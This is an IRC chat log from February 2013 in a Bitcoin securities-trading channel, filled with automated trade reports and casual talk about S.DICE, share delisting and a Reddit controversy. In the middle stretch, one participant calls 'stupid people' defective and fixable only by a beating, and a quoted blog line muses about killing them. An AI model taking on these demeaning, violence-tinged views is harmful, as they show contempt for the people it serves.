20.20000, 24 hour high: 21.09990, 24 hour vwap: 20.65643 Feb 06 05:19:12 thats nuts Feb 06 05:19:16 meanwhile Feb 06 05:19:19 21.099 Feb 06 05:19:31 that 40k ask wall, nowhere to be foun Feb 06 05:19:39 that's always nuts anywhere, but ... it's incredibly nuts on the bitcointalk forum. Feb 06 05:20:52 anybody use blockchain wallet? Feb 06 05:22:47 Bugpowduur: someone took down the 40k wall long before it was ever tested Feb 06 05:22:58 so evoorhees: whats the next one going to be priced at? Feb 06 05:23:16 0.6 sounds easonable Feb 06 05:23:22 boooo Feb 06 05:23:41 It's sound that blockchain is hacked Feb 06 05:23:42 don't know yet Feb 06 05:23:55 are you planning to do it every evening this week? Feb 06 05:24:05 [MPEX] [S.MPOE] 11824 @ 0.00066962 = 7.9176 BTC [-] Feb 06 05:24:07 [MPEX] [S.MPOE] 9802 @ 0.00066961 = 6.5635 BTC [-] Feb 06 05:24:25 topace - not sure on that either, but I will likely do the next tranche tomorrow night Feb 06 05:24:43 cool Feb 06 05:24:51 i leave for cuba on saturday, so please do them all before then Feb 06 05:24:54 62-66.... somwhere in there Feb 06 05:24:57 and then nothing for the next week Feb 06 05:25:00 cuba! Feb 06 05:25:01 :) Feb 06 05:25:02 cuba ?! Feb 06 05:25:09 CUBE? Feb 06 05:25:13 eh? Feb 06 05:25:14 Canadians <3 Cuba Feb 06 05:25:16 please do not get shot there Feb 06 05:25:23 get shot, get shot. Feb 06 05:25:25 of rum Feb 06 05:25:27 lol Feb 06 05:25:29 (because there's no americans on the resorts :p) Feb 06 05:25:29 multiple. Feb 06 05:25:34 [HAVELOCK] [SDICE] 20 @ 0.62 = 12.4 BTC [+] Feb 06 05:25:36 [HAVELOCK] [SDICE] 5 @ 0.6 = 3 BTC [-] Feb 06 05:25:50 do not get a cuban necktie or something.. its bad for your health Feb 06 05:27:28 [MPEX] [S.MPOE] 2111 @ 0.00066961 = 1.4135 BTC [-] Feb 06 05:27:30 [MPEX] [S.MPOE] 9289 @ 0.00066897 = 6.2141 BTC [-] Feb 06 05:28:55 well okay boys an' girls, we continue the fun & revolucion tomorro. Feb 06 05:29:43 yeap Feb 06 05:29:52 40k ask..? Feb 06 05:32:20 [MPEX] [S.MPOE] 4321 @ 0.00067616 = 2.9217 BTC [+] Feb 06 05:32:21 [MPEX] [S.MPOE] 379 @ 0.00067644 = 0.2564 BTC [+] **** BEGIN LOGGING AT Wed Feb 6 11:09:18 2013 Feb 06 11:09:56 good morning babies Feb 06 11:10:00 !ticker m s.dice Feb 06 11:10:02 [MPEX:S.DICE] 1D: 0.0052 / 0.00571875 / 0.0071999 (1023620 shares, 5,853.84 BTC), 7D: 0.0042 / 0.00564367 / 0.007395 (2683465 shares, 15,144.60 BTC), 30D: 0.00085848 / 0.00516574 / 0.0075 (7840852 shares, 40,503.87 BTC) Feb 06 11:10:10 [MPEX] [S.MPOE] 2494 @ 0.00068925 = 1.719 BTC [+] Feb 06 11:10:14 [MPEX] [S.MPOE] 16968 @ 0.00069191 = 11.7403 BTC [+] Feb 06 11:10:22 what did u have for breakfast mircea? Feb 06 11:11:18 hazelnuts so far Feb 06 11:11:29 eat walnuts they're better for you Feb 06 11:11:44 some of this, some of that you know ? Feb 06 11:11:44 :-D Feb 06 11:11:48 can't alwasy have the same thing Feb 06 11:11:50 guess thats how you stay not fat Feb 06 11:11:59 these are nice cause they're fresh, in shell Feb 06 11:12:19 truffles you kidding me ? one of the girls is doing a diet, calculated my intake last week Feb 06 11:12:28 i do ~25k calories a week Feb 06 11:12:38 ure on a diet? Feb 06 11:13:19 who knew gaining weight was so easy, i could major in that Feb 06 11:13:41 im not gaining any so far lol Feb 06 11:13:42 It's unfortunate it's not a question of pure caloric intake. Feb 06 11:13:49 [MPEX] [S.MPOE] 6183 @ 0.00069349 = 4.2878 BTC [+] Feb 06 11:13:54 [04:05:03] including dmc 1.0 ;) Feb 06 11:14:01 dmc 1.0 did not die because of expenditures Feb 06 11:14:15 hell, I didnt even pay myself Feb 06 11:14:22 Everyone is guilty of everything, unless proven otherwise Feb 06 11:14:34 Namworld: sometimes I feel this is what bitcoin has turned into Feb 06 11:15:06 What do you mean "turned into"? :-) Feb 06 11:15:19 he means this https://en.wikipedia.org/wiki/Cognitive_dissonance Feb 06 11:16:30 [BTCTC] [BTC-TRADING-PT] 19 @ 0.1268 = 2.4092 BTC [+] Feb 06 11:16:39 seems like lots of room for scams in a btc system Feb 06 11:16:41 [BTCTC] [BTC-TRADING-PT] 11 @ 0.1284 = 1.4124 BTC [+] Feb 06 11:16:43 Uglux: Don't you mean this: http://lesswrong.com/lw/6p6/the_limits_of_introspection/ Feb 06 11:16:55 lesswrong++ Feb 06 11:17:32 Diablo-D3: Ut.. you jinxed it for another three months by mentioning it. Feb 06 11:17:43 yes but I didnt say its name Feb 06 11:17:54 Diablo-D3: Doesn't matter, you still mentioned it. :) Feb 06 11:17:58 damnit :< Feb 06 11:18:04 hee hee Feb 06 11:18:24 seriously though we should ransom new chapters out of him Feb 06 11:18:30 [MPEX] [S.MPOE] 10434 @ 0.00069349 = 7.2359 BTC [+] Feb 06 11:18:31 [MPEX] [S.MPOE] 10900 @ 0.00069362 = 7.5605 BTC [+] Feb 06 11:18:33 [MPEX] [S.MPOE] 12146 @ 0.00069592 = 8.4526 BTC [+] Feb 06 11:18:39 [MPEX] [S.MPOE] 5893 @ 0.00069681 = 4.1063 BTC [+] Feb 06 11:20:06 [MPEX] [S.MPOE] 7693 @ 0.00069756 = 5.3663 BTC [+] Feb 06 11:24:11 [MPEX] [S.MPOE] 2500 @ 0.00069284 = 1.7321 BTC [-] Feb 06 11:30:46 [MPEX] [S.MPOE] 4138 @ 0.00069284 = 2.867 BTC [-] Feb 06 11:30:48 [MPEX] [S.MPOE] 4321 @ 0.0006809 = 2.9422 BTC [-] Feb 06 11:30:50 [MPEX] [S.MPOE] 10751 @ 0.00068072 = 7.3184 BTC [-] Feb 06 11:32:00 [MPEX] [S.MPOE] 12299 @ 0.00068072 = 8.3722 BTC [-] Feb 06 11:32:02 [MPEX] [S.MPOE] 1600 @ 0.00067872 = 1.086 BTC [-] Feb 06 11:32:03 [MPEX] [S.MPOE] 9300 @ 0.00067613 = 6.288 BTC [-] Feb 06 11:37:42 [MPEX] [S.DICE] 400 @ 0.00632911 = 2.5316 BTC [+] Feb 06 11:40:49 [MPEX] [S.MPOE] 4321 @ 0.00069746 = 3.0137 BTC [+] Feb 06 11:40:50 [MPEX] [S.MPOE] 79 @ 0.00069756 = 0.0551 BTC [+] Feb 06 11:47:57 http://trilema.com/2013/because-most-people-are-idiots-in-spite-of-never-manning-up-and-admitting-to-it/ Feb 06 11:48:14 mpex faq modified accordingly. sorry everyone. Feb 06 11:50:19 faq's are like fine prints who reads that Feb 06 11:50:51 "If you are one of the others, who cnat even wtire" spellcheck Feb 06 11:52:19 no, it's deliberate. Feb 06 11:52:25 cnat raed, cnat wtire. Feb 06 11:52:31 umk Feb 06 11:53:27 [MPEX] [S.DICE] 200 @ 0.00623517 = 1.247 BTC [-] Feb 06 11:56:20 but really why hate on stupid people, who else will gobble up these s.dice things : D Feb 06 11:57:09 heh Feb 06 11:57:38 having to sort through people to find the unstupid ones is everyone's main time/moneywaster. Feb 06 11:58:03 just avoid ppl no wasting done Feb 06 11:58:06 no matter what you're doing, trying to buy a new car, get married, get a job or hire someone, anything and everything you do Feb 06 11:58:17 most of your time and effort is expended fighting off the waves of stupid. Feb 06 11:58:56 a world of too smart is not good for me though Feb 06 11:59:18 it doesn't have to be too smart or smart at all Feb 06 11:59:21 just... not stupid. Feb 06 11:59:34 but then id be the dumbest! Feb 06 11:59:45 lol Feb 06 11:59:58 on which topic, i kinda love odolvlobo telling evoorhees "you are wrong on all counts" Feb 06 12:00:03 it's like... yeah, im sure he is. Feb 06 12:01:08 think about, if everyone was not dumb wont the pole shift for stupidity Feb 06 12:01:12 nope. Feb 06 12:01:15 [MPEX] [S.MPOE] 13699 @ 0.00068259 = 9.3508 BTC [-] Feb 06 12:01:19 there's no continuum from stupid to smart. Feb 06 12:01:23 stupidity is its own thing Feb 06 12:01:34 you're asking me "o, but if cancer were cured wouldnt the pole shift for being healthy" Feb 06 12:01:38 no, it wouldn't. Feb 06 12:01:50 the pole for dieing a horrible, disfiguring painful death would, maybe. Feb 06 12:02:05 assuming we have a somewhat stupidity scale before the no stupid ppl Feb 06 12:02:12 there's no scale. Feb 06 12:02:19 it's a thing Feb 06 12:02:36 it's not like being short, it's like being dead Feb 06 12:02:38 not the same thing Feb 06 12:02:42 you either are or are not Feb 06 12:03:30 im not sure what we're discussing now heh Feb 06 12:03:48 [MPEX] [S.MPOE] 11500 @ 0.00068594 = 7.8883 BTC [+] Feb 06 12:03:50 [MPEX] [S.MPOE] 16328 @ 0.00069756 = 11.3898 BTC [+] Feb 06 12:03:52 [MPEX] [S.MPOE] 16900 @ 0.0006976 = 11.7894 BTC [+] Feb 06 12:03:54 [MPEX] [S.MPOE] 8176 @ 0.00069804 = 5.7072 BTC [+] Feb 06 12:03:55 [MPEX] [S.MPOE] 5350 @ 0.00069908 = 3.7401 BTC [+] Feb 06 12:03:56 [MPEX] [S.MPOE] 15046 @ 0.00069913 = 10.5191 BTC [+] Feb 06 12:04:00 :p Feb 06 12:04:03 i see the whole stupid ppl thing as lack of resources or lack of access to info Feb 06 12:04:08 not at all. Feb 06 12:04:20 being stupid is a deliberate, internalized deffect. Feb 06 12:04:26 it can not be fixed with resources or info. Feb 06 12:04:38 it can be fixed in some cases with a beating, provided it's serious enough to scare them shitless. Feb 06 12:04:42 thats a bias on your part Feb 06 12:04:44 but in most cases, it can not be fixed at all Feb 06 12:04:53 no, it's not bias on my part. it'd be nice if it were, sure. Feb 06 12:05:13 unless ure talking about retards.. Feb 06 12:05:18 no, i'm not. Feb 06 12:05:45 then id say u dont like ppl with your set iq preferences Feb 06 12:05:52 without* Feb 06 12:06:37 it has nothing to do with iq Feb 06 12:06:53 again, being stupid is not a continuum with being smart. it is a property. Feb 06 12:07:15 object to this definition Feb 06 12:07:33 so go ahead, object. Feb 06 12:07:38 [MPEX] [S.MPOE] 851 @ 0.00068545 = 0.5833 BTC [-] Feb 06 12:07:43 i did Feb 06 12:08:06 aite then :) Feb 06 12:08:37 my counter points go way off topic.. Feb 06 12:10:02 tell you what, i'll make a post out of whis, then you can argue it in the comment section to your heart's content. Feb 06 12:10:23 nah Feb 06 12:10:29 id have to create an account Feb 06 12:10:48 [MPEX] [S.MPOE] 4321 @ 0.0006793 = 2.9353 BTC [-] Feb 06 12:10:55 [MPEX] [S.MPOE] 14079 @ 0.00067912 = 9.5613 BTC [-] Feb 06 12:11:12 i do like debating though :) Feb 06 12:11:21 mircea_popescu: BF topped 1655 BTC 24hr vol ;) Feb 06 12:11:34 I know it doesnt hold a candle to mpex, but I thought it was pretty neat. :) Feb 06 12:12:12 Ukto it's not bad at all. Feb 06 12:12:15 pity we can't see it at all. Feb 06 12:12:24 sure you can :P Feb 06 12:12:51 i made alot of good progress today on my big release Feb 06 12:12:57 getting closer to beta testing Feb 06 12:13:06 very excited Feb 06 12:13:38 It's all S.DICE =/ Feb 06 12:15:11 anyone watched these bitcoin show episodes? Feb 06 12:16:42 [BTCTC] [GSDPT] 157 @ 0.0062 = 0.9734 BTC [-] Feb 06 12:17:01 1,863 views on ep 2 so doubt it heh Feb 06 12:17:32 Namworld: mostly. heh Feb 06 12:18:14 you can say the same thing for btct atm though Feb 06 12:18:19 it just happens to the be highest trader Feb 06 12:18:19 yeah Feb 06 12:18:29 once sdice calms down Feb 06 12:18:33 other assets iwll pick back up again Feb 06 12:18:38 on both sites Feb 06 12:20:00 [MPEX] [S.MPOE] 5844 @ 0.00068123 = 3.9811 BTC [+] Feb 06 12:20:06 Probably Feb 06 12:20:21 I wonder who BitVPS holders are Feb 06 12:20:34 hm ? Feb 06 12:20:42 won't be a mystery for long Feb 06 12:21:04 I'll only get a gpg key fingerprint with holding Feb 06 12:21:16 ya. Feb 06 12:21:20 sounds like claimings gonna be a pain for you :/ Feb 06 12:21:22 a i see what you mea Feb 06 12:21:23 n Feb 06 12:21:35 Actually, all already know how to use gpg Feb 06 12:21:44 no, i ment for you Feb 06 12:21:45 Since they used MPEx to get them Feb 06 12:21:47 to manually verify each one hehe Feb 06 12:21:52 why ? he just gets signed statements Feb 06 12:21:56 what's to verify ? Feb 06 12:22:05 the sig mebbe ? heh Feb 06 12:22:12 ya well that sounds like a pain sure Feb 06 12:22:13 lol Feb 06 12:22:17 LOL Feb 06 12:22:23 awk will suffer greatly. Feb 06 12:22:24 but thats security. Feb 06 12:22:36 To transfer people, they'll need to sign me their BTCT.co account username. Feb 06 12:22:47 I'll have to get and verify these. Feb 06 12:22:53 Namworld might be an idea to make a preemptive explanation of what happens Feb 06 12:22:55 can prolly script something up Feb 06 12:22:59 so people know before the 15tyh Feb 06 12:23:20 "f it were practical I’d just kill them all with my own hand. Unfortunately, it is not practical" haha you'r crazy Feb 06 12:23:50 Namworld: wonder how feasable it would be for burnside to build in gpg verification for you ? Feb 06 12:24:24 certinly would save a lot of effort Feb 06 12:24:41 error4733 lalala Feb 06 12:24:43 then again, if theres not that many holders, its not a big deal I guess Feb 06 12:25:03 Ukto prolly a little difficult cause people might not get the syntax right Feb 06 12:25:49 bah, a little js "fill in the fields and do X" Feb 06 12:25:50 :P Feb 06 12:25:58 well, the gpg part. how do they verify ? Feb 06 12:26:09 BitVPS has somewhere around 730k Feb 06 12:26:18 I have around 125k Feb 06 12:26:18 how many shareholders MP ? Feb 06 12:26:26 no offense, it's fun. Feb 06 12:26:29 i have no idea. Feb 06 12:26:40 error4733 it's pretty hard to offend me Feb 06 12:26:51 and total agree Feb 06 12:27:22 it has to be said, you know ? this regurgitated fake consensus of "o, everyone's speshul" is inadequate to explain the complexity of reality. Feb 06 12:27:39 i mean, how would Namworld verify their shares manually? Feb 06 12:27:57 i imagine send burnside a list of names and shares ? dunno how btctc works Feb 06 12:28:26 well, i guess your sending the share amuont + fingerprint Feb 06 12:28:28 right? Feb 06 12:28:56 so the gpg stuff, user just has to sign a simple msg, and fingerprint should match Feb 06 12:29:35 anyawys, i'm tired. prolly going on for nothing. just trying to give some ideas to make life easy Feb 06 12:29:35 yup Feb 06 12:29:43 ignore me :) Feb 06 12:31:51 [MPEX] [S.MPOE] 2631 @ 0.00068123 = 1.7923 BTC [+] Feb 06 12:31:52 [MPEX] [S.MPOE] 4321 @ 0.0006817 = 2.9456 BTC [+] Feb 06 12:31:55 [MPEX] [S.MPOE] 1948 @ 0.00068181 = 1.3282 BTC [+] Feb 06 12:33:23 [BTCTC] [GSDPT] 285 @ 0.0062 = 1.767 BTC [-] Feb 06 12:36:02 Any S.BVPS holder? You can contact me right away with a signed statement containing your BTCT.co username Feb 06 12:39:02 [MPEX] [S.MPOE] 10592 @ 0.00068181 = 7.2217 BTC [+] Feb 06 12:40:32 [MPEX] [S.MPOE] 353 @ 0.00068181 = 0.2407 BTC [+] Feb 06 12:42:55 [MPEX] [S.MPOE] 15247 @ 0.00068339 = 10.4196 BTC [+] Feb 06 12:42:57 [MPEX] [S.MPOE] 2803 @ 0.00067912 = 1.9036 BTC [-] Feb 06 12:43:30 You can mail it at the email seen on BTCT.co Feb 06 12:48:12 [BTCTC] [S.DICE-PT] 2000 @ 0.0062 = 12.4 BTC Feb 06 12:49:50 I will need to transfer that quickly to MPEx if I'm to buy more share. Feb 06 12:50:20 I expect price to climb back to .007 later and would certainly like to sell another batch then Feb 06 12:50:53 [MPEX] [S.MPOE] 8650 @ 0.00068522 = 5.9272 BTC [+] Feb 06 12:50:55 [MPEX] [S.MPOE] 12500 @ 0.00068738 = 8.5923 BTC [+] Feb 06 12:51:03 Otherwise it feels like a loss =/ Feb 06 12:53:36 [MPEX] [S.BBET] 363 @ 0.0015999 = 0.5808 BTC [+] Feb 06 12:53:38 [MPEX] [S.BBET] 637 @ 0.0015999 = 1.0191 BTC [+] Feb 06 12:54:02 [BTCTC] [S.BBET-PT] 1000 @ 0.0016 = 1.6 BTC Feb 06 12:55:18 [MPEX] [S.MPOE] 1000 @ 0.00068738 = 0.6874 BTC [+] Feb 06 12:55:37 [BTCTC] [S.MPOE-PT] 1000 @ 0.0007 = 0.7 BTC Feb 06 12:56:37 burnside Feb 06 12:57:12 the fact you can't enter more than 4 digits after the dot... kind of doesn't support S.MPOE-PT for pricing. Feb 06 12:57:25 Why is it limited to 4 digits anyway? Feb 06 12:57:29 [MPEX] [S.MPOE] 4200 @ 0.00068738 = 2.887 BTC [+] Feb 06 12:57:30 [MPEX] [S.MPOE] 16249 @ 0.00068891 = 11.1941 BTC [+] Feb 06 12:57:35 [MPEX] [S.MPOE] 573 @ 0.00069172 = 0.3964 BTC [+] Feb 06 12:57:47 Ah well Feb 06 12:58:05 Looks like I'm talking alone. Feb 06 12:58:14 yes, I see no one else talking Feb 06 12:58:22 weird, usually thats me. lol Feb 06 13:01:34 [MPEX] [S.MPOE] 2193 @ 0.00069172 = 1.5169 BTC [+] Feb 06 13:01:36 [MPEX] [S.MPOE] 457 @ 0.00069652 = 0.3183 BTC [+] Feb 06 13:03:10 [MPEX] [S.MPOE] 9950 @ 0.00069652 = 6.9304 BTC [+] Feb 06 13:05:05 Well I guess I'll be off then. Night everyone. Feb 06 13:25:26 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [-] Feb 06 13:28:43 [MPEX] [S.MPOE] 850 @ 0.00069192 = 0.5881 BTC [-] Feb 06 13:28:45 [MPEX] [S.MPOE] 50 @ 0.00068681 = 0.0343 BTC [-] Feb 06 13:33:59 [MPEX] [S.MPOE] 14450 @ 0.00068681 = 9.9244 BTC [-] Feb 06 13:34:01 [MPEX] [S.MPOE] 18982 @ 0.00068466 = 12.9962 BTC [-] Feb 06 13:52:43 wow quiet Feb 06 13:52:47 a little too quiet Feb 06 13:54:21 [MPEX] [S.MPOE] 11300 @ 0.00068601 = 7.7519 BTC [+] Feb 06 13:54:23 [MPEX] [S.MPOE] 1400 @ 0.00068466 = 0.9585 BTC [-] Feb 06 14:01:27 [HAVELOCK] [SDICE] 1 @ 0.68 BTC [-] Feb 06 14:01:29 [HAVELOCK] [SDICE] 9 @ 0.68 = 6.12 BTC [-] Feb 06 14:01:33 welll... it's the middle of the night Feb 06 14:10:43 [MPEX] [S.MPOE] 773 @ 0.00069327 = 0.5359 BTC [+] Feb 06 14:10:45 [MPEX] [S.MPOE] 2306 @ 0.00069328 = 1.5987 BTC [+] Feb 06 14:14:40 sooo... inaba is now "definitely" on the 22nd Feb 06 14:15:00 someone's going to make a lot of btc on http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Feb 06 14:15:27 [HAVELOCK] [SDICE] 1 @ 0.685 BTC [+] Feb 06 14:17:14 [MPEX] [S.MPOE] 773 @ 0.00069081 = 0.534 BTC [-] Feb 06 14:17:16 [MPEX] [S.MPOE] 8519 @ 0.0006908 = 5.8849 BTC [-] Feb 06 14:20:53 [MPEX] [S.MPOE] 9444 @ 0.00069328 = 6.5473 BTC [+] Feb 06 14:20:55 [MPEX] [S.MPOE] 6406 @ 0.00069394 = 4.4454 BTC [+] Feb 06 14:28:15 [MPEX] [S.MPOE] 5900 @ 0.00069394 = 4.0942 BTC [+] Feb 06 14:28:54 [MPEX] [S.MPOE] 2400 @ 0.0006908 = 1.6579 BTC [-] Feb 06 14:34:31 [MPEX] [S.MPOE] 773 @ 0.00069393 = 0.5364 BTC [+] Feb 06 14:34:32 [MPEX] [S.MPOE] 4682 @ 0.00069394 = 3.249 BTC [+] Feb 06 14:34:34 [MPEX] [S.MPOE] 1845 @ 0.00069652 = 1.2851 BTC [+] Feb 06 14:40:16 anyone understood how Namworld is planning it? Feb 06 14:42:39 planning what? Feb 06 14:42:49 sounds like you give your signed statement to burnside and he matches it with a list he got from MP or Namworld and gives you shares? Feb 06 14:43:07 for delisting of S.BVPS and moving to btct Feb 06 14:43:12 ah Feb 06 14:43:50 pigeons, i'm thinking how to proceed with coinbr users Feb 06 14:44:16 prolly i add a field to enter their btct username Feb 06 14:44:31 and they'll have to do it till Feb 15 Feb 06 14:45:00 if enough people bet you wont, just scam and get the tag so you win the bet ;)dont forget service fee ;) Feb 06 14:45:10 oops that was weird Feb 06 14:45:11 oh and i'll disable further buying of s.bvps. Feb 06 14:45:20 i meant dont forget service fee Feb 06 14:45:25 jeeeez, thee's a scammer bet on me? where? Feb 06 14:45:37 no that was up arrow from talking to usagi earlier Feb 06 14:45:38 haha Feb 06 14:46:05 lol Feb 06 14:51:26 [MPEX] [S.MPOE] 776 @ 0.00069081 = 0.5361 BTC [-] Feb 06 14:51:28 [MPEX] [S.MPOE] 22709 @ 0.0006908 = 15.6874 BTC [-] Feb 06 14:51:30 [MPEX] [S.MPOE] 6900 @ 0.00068951 = 4.7576 BTC [-] Feb 06 14:51:32 [MPEX] [S.MPOE] 1915 @ 0.00068948 = 1.3204 BTC [-] Feb 06 15:02:27 [HAVELOCK] [SDICE] 20 @ 0.699 = 13.98 BTC [+] Feb 06 15:02:27 [HAVELOCK] [SDICE] 10 @ 0.7 = 7 BTC [+] Feb 06 15:02:29 [HAVELOCK] [SDICE] 5 @ 0.7 = 3.5 BTC [+] Feb 06 15:03:20 [MPEX] [S.MPOE] 11150 @ 0.00069631 = 7.7639 BTC [+] Feb 06 15:11:27 [HAVELOCK] [KCIM] 1 @ 0.995 BTC [-] Feb 06 15:12:25 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [-] Feb 06 15:12:27 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [-] Feb 06 15:13:11 http://www.npr.org/blogs/alltechconsidered/2013/02/06/171182974/is-online-gambling-legal-if-bitcoins-not-dollars-are-at-stake Feb 06 15:13:26 [HAVELOCK] [KCIM] 7 @ 0.926 = 6.482 BTC [-] Feb 06 15:13:27 [HAVELOCK] [KCIM] 2 @ 0.926 = 1.852 BTC [-] Feb 06 15:14:26 pigeons: interesting article Feb 06 15:14:42 still doesn't answer the question, though Feb 06 15:15:26 [HAVELOCK] [KCIM] 8 @ 0.925 = 7.4 BTC [-] Feb 06 15:15:26 the question is irrelevant Feb 06 15:15:47 elaborate, please Feb 06 15:16:15 who cares? Feb 06 15:16:28 gambling sites probably do Feb 06 15:16:32 http://www.reddit.com/r/Bitcoin/comments/17zq8j/because_most_people_are_idiots_in_spite_of_never/ Feb 06 15:16:35 this is going over well. Feb 06 15:17:01 i wonder what reddit will do once they discover that added together they all mean nothing at all. Feb 06 15:17:44 mircea_popescu: I take it you don't like reddit much. Feb 06 15:17:54 i don't care much either way. Feb 06 15:17:57 it is kind of amusing tho Feb 06 15:19:00 or to quote the pr chick, " it's hard to believe these assholes are so upset at the idea that someone else is an asshole... actually, it makes perfect sense doesn't it." Feb 06 15:21:45 [MPEX] [S.DICE] 498 @ 0.00620895 = 3.0921 BTC [-] Feb 06 15:24:43 [MPEX] [S.MPOE] 776 @ 0.0006963 = 0.5403 BTC [-] Feb 06 15:24:47 [MPEX] [S.MPOE] 8474 @ 0.00069631 = 5.9005 BTC [+] Feb 06 15:33:54 did you see my response on reddit mp? Feb 06 15:34:48 nope ? Feb 06 15:35:32 hahahahaha Nefario the CEO has been detained by the SEC for fraud, closing the website and taking all of the investors money and shares. Feb 06 15:35:37 ^^ http://bitcoin.stackexchange.com/questions/4983/why-did-glbse-close Feb 06 15:36:21 uh ?! that is nonsense Feb 06 15:37:11 it got me... reading these quite reasonable replies and suddenly on the bottom, this Feb 06 15:37:17 lol Feb 06 15:37:27 the alines did it Feb 06 15:38:14 HE CLOSED THE WEBSITE AND TOOK ALL SHARES Feb 06 15:38:41 [MPEX] [S.MPOE] 1377 @ 0.00069238 = 0.9534 BTC [-] Feb 06 15:38:43 [MPEX] [S.MPOE] 782 @ 0.00068949 = 0.5392 BTC [-] Feb 06 15:38:44 [MPEX] [S.MPOE] 15441 @ 0.00068948 = 10.6463 BTC [-] Feb 06 15:40:02 no it was the aliens Feb 06 15:40:32 "Edit: NO ONE SHOULD TRUST MPEX WITH 50000. Just using as an example. I wouldn't trust MPEX with 5 cents personally." Feb 06 15:40:42 right, there's what, 20k btc lying around at the moment ? Feb 06 15:40:45 [MPEX] [S.MPOE] 20500 @ 0.00068948 = 14.1343 BTC [-] Feb 06 15:40:47 clearly reddit has a point. Feb 06 15:41:37 In other news: Nefario found in Death Valley dehydrated, with amnesia and with strange scar on forehead" Feb 06 15:42:57 no aliens do anal probing Feb 06 15:43:04 what would they want inside his head ? Feb 06 15:43:53 [MPEX] [S.MPOE] 11900 @ 0.00069601 = 8.2825 BTC [+] Feb 06 15:43:55 [MPEX] [S.MPOE] 5676 @ 0.00069631 = 3.9523 BTC [+] Feb 06 15:43:58 i thought they mutilated cattle Feb 06 15:43:59 [MPEX] [S.MPOE] 3624 @ 0.00069652 = 2.5242 BTC [+] Feb 06 15:46:11 or maybe it was not abduction. nef just returned home Feb 06 15:46:17 like elvis Feb 06 15:53:42 [MPEX] [S.MPOE] 1374 @ 0.00069652 = 0.957 BTC [+] Feb 06 15:53:45 [MPEX] [S.MPOE] 4321 @ 0.00069912 = 3.0209 BTC [+] Feb 06 15:53:47 [MPEX] [S.MPOE] 4321 @ 0.00069912 = 3.0209 BTC [+] Feb 06 15:53:48 [MPEX] [S.MPOE] 8934 @ 0.00069913 = 6.246 BTC [+] Feb 06 15:54:14 [MPEX] [S.MPOE] 3405 @ 0.00068948 = 2.3477 BTC [-] Feb 06 15:54:16 [MPEX] [S.MPOE] 895 @ 0.00068945 = 0.6171 BTC [-] Feb 06 15:58:08 http://i.imgur.com/YoatKlh.gif Feb 06 15:58:15 bump. Feb 06 15:58:23 ahahah Feb 06 15:58:59 bombs don't kill people Feb 06 15:59:02 people kill people. Feb 06 15:59:05 :D Feb 06 16:01:14 [MPEX] [S.MPOE] 782 @ 0.00069912 = 0.5467 BTC [+] Feb 06 16:01:16 [MPEX] [S.MPOE] 13220 @ 0.00069913 = 9.2425 BTC [+] Feb 06 16:01:18 [MPEX] [S.MPOE] 6796 @ 0.00069948 = 4.7537 BTC [+] Feb 06 16:06:38 [MPEX] [S.DICE] 7580 @ 0.00620002 = 46.9962 BTC [-] Feb 06 16:06:42 [MPEX] [S.DICE] 54959 @ 0.0062 = 340.7458 BTC [-] Feb 06 16:09:59 looks like somebody cashed in their S.DICE gains Feb 06 16:10:12 for now Feb 06 16:10:21 someone is closing shorts Feb 06 16:10:57 how do you short? Feb 06 16:11:01 [MPEX] [S.MPOE] 5604 @ 0.00069948 = 3.9199 BTC [+] Feb 06 16:11:07 [MPEX] [S.MPOE] 5000 @ 0.00069995 = 3.4998 BTC [+] Feb 06 16:11:09 [MPEX] [S.MPOE] 6634 @ 0.00069996 = 4.6435 BTC [+] Feb 06 16:11:09 manually borrow the shares from someone Feb 06 16:11:11 you borrow shares from someone Feb 06 16:11:30 ok, just checking to make sure MPEx wouldn't do it for you... Feb 06 16:11:47 mircea_popescu isn't that nice Feb 06 16:12:06 hm ? Feb 06 16:12:17 it'd be risky on his end Feb 06 16:13:01 [MPEX] [S.MPOE] 3426 @ 0.00068945 = 2.3621 BTC [-] Feb 06 16:13:07 announcement for coinbr users: http://www.bitcoinforum.com/coinbr-com/s-bvps-delists-soon-action-from-shareholders-required-till-february-15th/ Feb 06 16:13:08 [MPEX] [S.MPOE] 3374 @ 0.00068707 = 2.3182 BTC [-] Feb 06 16:13:09 mircea_popescu in regards to what you get -> http://i.imgur.com/kT4NySa.gif Feb 06 16:13:36 lol Feb 06 16:13:41 heh Feb 06 16:14:05 i wonder if that reddit thing goes over 100 comments of pure spazz Feb 06 16:14:37 come again mp? Feb 06 16:18:18 mp is suprised that when he says stupid people should die, people take his bait Feb 06 16:19:33 mp have you ever read enders game? Feb 06 16:19:39 or you pigeons? Feb 06 16:20:50 yes Feb 06 16:21:06 dragon army was full of stupid people before ender trained them Feb 06 16:21:38 simply put, the people are only as stupid as the current leadership Feb 06 16:22:35 i dont think ther eis disagreement with the people are stupoid part, its the conclusion that therefore they should die that brings the fun Feb 06 16:22:44 That reddit thread made me giggle like a country moron… highly entertaining Feb 06 16:22:59 maximian: where are you from? Feb 06 16:23:11 canada Feb 06 16:23:22 we say giggle like a city moron Feb 06 16:23:37 where's that? Feb 06 16:23:42 the Carolinas Feb 06 16:23:45 heheh Feb 06 16:25:43 http://www.reddit.com/r/Bitcoin/comments/17yjm6/what_is_bitcoin/ Feb 06 16:27:07 maximian indeed :D Feb 06 16:27:17 pigeons o, i am not surprised. im amused. Feb 06 16:27:18 It is interesting that people actually care whether or not the owner of a business is a nice guy Feb 06 16:27:38 [MPEX] [S.MPOE] 4321 @ 0.00068742 = 2.9703 BTC [+] Feb 06 16:27:39 [MPEX] [S.MPOE] 5877 @ 0.00068708 = 4.038 BTC [-] Feb 06 16:27:40 [MPEX] [S.MPOE] 1602 @ 0.00068707 = 1.1007 BTC [-] Feb 06 16:27:45 well that's because they think that the owner of a business didn't make that business. Feb 06 16:27:58 some people buy the why not the what. Feb 06 16:28:14 I mean, I have no idea if the CEO of Sony is a fucking asshole, and I don't care, but I still buy their stuff now and then Feb 06 16:28:25 i have an idea he is Feb 06 16:28:34 i think the onlysony item i ever owned was a walkman back in like 85 Feb 06 16:31:21 i'm going to start calling ipods "walkman" now just cause i know apple people will like that Feb 06 16:31:29 [MPEX] [S.MPOE] 4024 @ 0.00068707 = 2.7648 BTC [-] Feb 06 16:31:31 [MPEX] [S.MPOE] 10100 @ 0.00068689 = 6.9376 BTC [-] Feb 06 16:31:33 [MPEX] [S.MPOE] 1818 @ 0.00068466 = 1.2447 BTC [-] Feb 06 16:31:34 [MPEX] 